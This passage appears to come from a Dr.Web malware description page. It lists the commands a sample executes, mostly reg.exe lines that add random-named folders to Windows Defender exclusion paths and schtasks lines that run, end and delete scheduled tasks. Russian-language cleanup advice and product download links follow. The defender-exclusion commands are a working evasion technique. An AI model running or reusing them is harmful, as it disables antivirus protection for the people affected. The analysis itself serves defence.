  • '%WINDIR%\syswow64\schtasks.exe' /run /I /tn "gUsiKjcxd"
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\YLQHmdNDdZUGobZP" /t REG_DWORD /d 0 /reg:64
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\LgcTNBcqQPlcodRnApR" /t REG_DWORD /d 0 /reg:32
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\LgcTNBcqQPlcodRnApR" /t REG_DWORD /d 0 /reg:64
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\TnjQjowBU" /t REG_DWORD /d 0 /reg:32
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\TnjQjowBU" /t REG_DWORD /d 0 /reg:64
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\bhqBkEsJVojqC" /t REG_DWORD /d 0 /reg:32
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\bhqBkEsJVojqC" /t REG_DWORD /d 0 /reg:64
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\kTfFAHiiclUn" /t REG_DWORD /d 0 /reg:32
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\kTfFAHiiclUn" /t REG_DWORD /d 0 /reg:64
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\vGVMsIQpaIE" /t REG_DWORD /d 0 /reg:32
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\vGVMsIQpaIE" /t REG_DWORD /d 0 /reg:64
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\ypJYDLDaGTvU2" /t REG_DWORD /d 0 /reg:32
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\ypJYDLDaGTvU2" /t REG_DWORD /d 0 /reg:64
  • '%WINDIR%\syswow64\cmd.exe' /C copy nul "%WINDIR%\Temp\YLQHmdNDdZUGobZP\TraLKXkg\gNUnXyjpyoOWxjZJ.wsf"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "BhHKeSiJpQFoa2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "iKcIoErIoYBmad"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "BCwHabCCSHPfAsOTU2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "NPFmUjBNkjjYbsCDT2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "fJSQumogLvFfZRMVD2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "fJSQumogLvFfZRMVD2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "grutyeFXcoQdatdcenL"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "grutyeFXcoQdatdcenL"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "grutyeFXcoQdatdcenL2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "grutyeFXcoQdatdcenL2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "WtwuZRUuBwrYwECdMSs"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "WtwuZRUuBwrYwECdMSs"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "WtwuZRUuBwrYwECdMSs2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "WtwuZRUuBwrYwECdMSs2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "YFVwlirkeXjFKXHJv2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "yBlmkhwMOrWEEEKzHdZ"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "fJSQumogLvFfZRMVD"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "yBlmkhwMOrWEEEKzHdZ2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "abEuxqRloTmQdHqOHit"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "abEuxqRloTmQdHqOHit"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "abEuxqRloTmQdHqOHit2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "abEuxqRloTmQdHqOHit2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "bsUsNvmYbEkcqgNWYxC"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "bsUsNvmYbEkcqgNWYxC"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "bsUsNvmYbEkcqgNWYxC2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "bsUsNvmYbEkcqgNWYxC2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "kdpAGtrckdwHDCnJoAD"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "kdpAGtrckdwHDCnJoAD"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "yBlmkhwMOrWEEEKzHdZ"
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\zViIoQpHNdxIS" /t REG_DWORD /d 0 /reg:64
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "yBlmkhwMOrWEEEKzHdZ2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "fJSQumogLvFfZRMVD"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "YFVwlirkeXjFKXHJv2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "YFVwlirkeXjFKXHJv"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "NPFmUjBNkjjYbsCDT2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "POLdRoXzKOVBzLliU"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "POLdRoXzKOVBzLliU"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "POLdRoXzKOVBzLliU2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "POLdRoXzKOVBzLliU2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "oYzIKKWefrhhWhKir"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "oYzIKKWefrhhWhKir"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "oYzIKKWefrhhWhKir2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "oYzIKKWefrhhWhKir2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "nmqltrnDsqSApMsgv"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "nmqltrnDsqSApMsgv"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "NPFmUjBNkjjYbsCDT"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "nmqltrnDsqSApMsgv2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "gKYeyRTYHKWLTPpEh"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "gKYeyRTYHKWLTPpEh"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "gKYeyRTYHKWLTPpEh2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "gKYeyRTYHKWLTPpEh2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "FXHhLMdhFZlcxDVTN"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "FXHhLMdhFZlcxDVTN"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "FXHhLMdhFZlcxDVTN2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "FXHhLMdhFZlcxDVTN2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "lRKWQqInghLVSAQey"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "lRKWQqInghLVSAQey"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "lRKWQqInghLVSAQey2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "lRKWQqInghLVSAQey2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "nmqltrnDsqSApMsgv2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "YFVwlirkeXjFKXHJv"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "NPFmUjBNkjjYbsCDT"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "BhHKeSiJpQFoa2"

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Демо бесплатно

 

Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

Демо бесплатно

 

Скачать Dr.Web

По серийному номеру

Скачать Dr.Web с Apple Store

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Демо бесплатно

 

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке

Скачать с сайта
Скачать с Google Play